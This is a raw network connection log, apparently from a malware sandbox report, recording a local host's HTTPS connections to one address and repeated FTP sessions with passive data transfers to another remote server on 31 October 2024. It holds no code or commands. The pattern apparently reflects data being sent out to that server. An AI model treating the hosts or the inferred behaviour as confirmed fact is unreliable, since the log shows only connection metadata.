                                                  Oct 31, 2024 17:03:14.163503885 CET44349740104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:14.163610935 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:14.165512085 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:14.165539026 CET44349740104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:14.165812969 CET44349740104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:14.209925890 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:14.241842031 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:14.283373117 CET44349740104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:14.438739061 CET44349740104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:14.438813925 CET44349740104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:14.439085960 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:14.441760063 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:14.951239109 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:14.956288099 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:14.956415892 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:16.086189985 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:16.086504936 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:16.091492891 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:16.467320919 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:16.479521990 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:16.484489918 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:17.254580021 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:17.254707098 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:17.255176067 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:17.255229950 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:17.260451078 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:17.611933947 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:17.612101078 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:17.616935968 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:17.973476887 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:17.973634958 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:17.978513956 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:18.330504894 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:18.331142902 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:18.336133957 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:18.688329935 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:18.688868999 CET4974659700192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:18.694797993 CET5970049746110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:18.694884062 CET4974659700192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:18.695849895 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:18.700992107 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:19.796546936 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:19.796758890 CET4974659700192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:19.796799898 CET4974659700192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:19.841425896 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.079937935 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.079988956 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.081404924 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.081445932 CET5970049746110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.081450939 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.095777988 CET5970049746110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.095891953 CET4974659700192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.478665113 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.501667976 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.506556034 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.859992981 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.860850096 CET4974855079192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.865762949 CET5507949748110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:20.865871906 CET4974855079192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.865871906 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:20.870852947 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:21.757776976 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:21.757806063 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:21.757879972 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:21.762408018 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:21.762422085 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:21.792996883 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:21.834847927 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:22.060389996 CET2149741110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:22.060476065 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:22.370229959 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:22.370316982 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:22.374033928 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:22.374046087 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:22.374418974 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:22.423156023 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:22.467323065 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:22.637828112 CET4974121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:22.638009071 CET4974855079192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:22.645109892 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:22.645220041 CET44349750104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:22.645510912 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:22.649725914 CET49750443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:23.127978086 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:23.132934093 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:23.135977983 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:24.058864117 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:24.065326929 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:24.070239067 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:24.406502008 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:24.406656027 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:24.411552906 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:24.772254944 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:24.772437096 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:24.777374029 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:25.116749048 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:25.116878033 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:25.129585981 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:25.484019995 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:25.484165907 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:25.489141941 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.006067991 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.006278992 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:26.225032091 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:26.264818907 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.264869928 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:26.267910004 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.267957926 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:26.268579960 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.268589973 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.604429960 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.605091095 CET4975260611192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:26.610747099 CET6061149752110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:26.610817909 CET4975260611192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:26.610862970 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:26.615808010 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:27.637490988 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:27.637706041 CET4975260611192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:27.637773991 CET4975260611192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:27.645462036 CET6061149752110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:27.651477098 CET6061149752110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:27.651556015 CET4975260611192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:27.678579092 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:27.988135099 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:28.010612011 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:28.017772913 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:28.352710009 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:28.353094101 CET4975358830192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:28.358802080 CET5883049753110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:28.358881950 CET4975358830192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:28.358917952 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:28.364804983 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.270622969 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.284713030 CET4975358830192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.284713030 CET4975358830192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.289907932 CET5883049753110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.289921045 CET5883049753110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.289931059 CET5883049753110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.290724039 CET5883049753110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.293580055 CET4975358830192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.319225073 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.623159885 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.623670101 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.628648043 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.966567039 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.966964960 CET4975453913192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.971815109 CET5391349754110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:29.971882105 CET4975453913192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.971963882 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:29.977011919 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:31.271491051 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:31.271893024 CET4975453913192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:31.274662018 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:31.274725914 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:31.584971905 CET4975453913192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:31.606643915 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:31.609571934 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:31.612060070 CET5391349754110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:31.612104893 CET5391349754110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:31.612277031 CET4975453913192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:31.948292017 CET2149751110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:31.991096020 CET4975121192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.740777969 CET6369621192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.740932941 CET6369721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.745610952 CET2163696110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:04:57.745834112 CET6369621192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.745994091 CET6369621192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.746226072 CET2163697110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:04:57.746290922 CET6369721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.746550083 CET6369721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.751663923 CET2163696110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:04:57.751761913 CET6369621192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:04:57.751780033 CET2163697110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:04:57.755799055 CET6369721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:21.010380983 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:21.015438080 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:21.015497923 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:21.953092098 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:21.953917027 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:21.960035086 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:22.299539089 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:22.300188065 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:22.305010080 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:22.670706034 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:22.671897888 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:22.676775932 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:23.017580986 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:23.017726898 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:23.022547007 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:23.314280987 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:23.319403887 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:23.319473028 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:23.361634970 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:23.361752987 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:23.366621971 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:23.706084967 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:23.706178904 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:23.711261988 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.049906015 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.050579071 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.055579901 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.055772066 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.055854082 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.060782909 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.235661983 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.236637115 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.241420984 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.581289053 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.581662893 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.586445093 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.945266008 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.950980902 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.953655005 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.956650972 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.959747076 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962361097 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962379932 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962424994 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962430000 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962450981 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.962491989 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.962527990 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962595940 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962599993 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962651014 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.962676048 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962704897 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.962778091 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.964595079 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.964648962 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.967468023 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.967519999 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.967530966 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.967535019 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.967581034 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.967649937 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.968190908 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.968707085 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.968710899 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.968780994 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:24.969976902 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.973608017 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.973997116 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.973999977 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.974004030 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.974586964 CET5328063700110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:24.974884987 CET6370053280192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:25.163149118 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:25.335859060 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:25.335943937 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:25.336463928 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:25.336582899 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:25.661079884 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:25.752062082 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:25.752103090 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:25.752496004 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:25.752521992 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:25.752568960 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:25.753807068 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:25.753818035 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:25.866264105 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:26.090719938 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:26.092742920 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:26.097687006 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:26.433299065 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:26.433572054 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:26.438576937 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:26.774559021 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:26.776145935 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:26.781024933 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:26.783852100 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:26.783967972 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:26.788804054 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.924293995 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.924505949 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.924916983 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.924961090 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.929449081 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929476976 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929481983 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929486036 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929513931 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.929534912 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929550886 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.929550886 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929588079 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.929615021 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.929697990 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929745913 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.929774046 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929786921 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929796934 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.929817915 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.929838896 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.934446096 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.934473038 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.934497118 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.934511900 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.934528112 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.934561968 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.934571981 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.934587002 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.934596062 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.934607029 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.934637070 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.934680939 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.934731960 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:27.934932947 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.939373016 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.939799070 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.940813065 CET5312463701110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:27.940864086 CET6370153124192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:28.706113100 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:28.914628983 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:28.914660931 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:28.915977955 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:29.267884016 CET6370221192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:29.274209976 CET2163702110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:29.274270058 CET6370221192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:29.274451971 CET6370221192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:29.282040119 CET2163702110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:29.282078028 CET6370221192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:48.176316023 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:48.181292057 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:48.516638994 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:48.517755032 CET6370357283192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:48.522792101 CET5728363703110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:48.522852898 CET6370357283192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:48.522939920 CET6369921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:48.527849913 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:49.436495066 CET2163699110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:49.436769962 CET6370357283192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:05:49.441752911 CET5728363703110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:49.441781998 CET5728363703110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:49.441862106 CET5728363703110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:49.441867113 CET5728363703110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:49.441879034 CET5728363703110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:05:49.441981077 CET6370357283192.168.2.4110.4.45.197
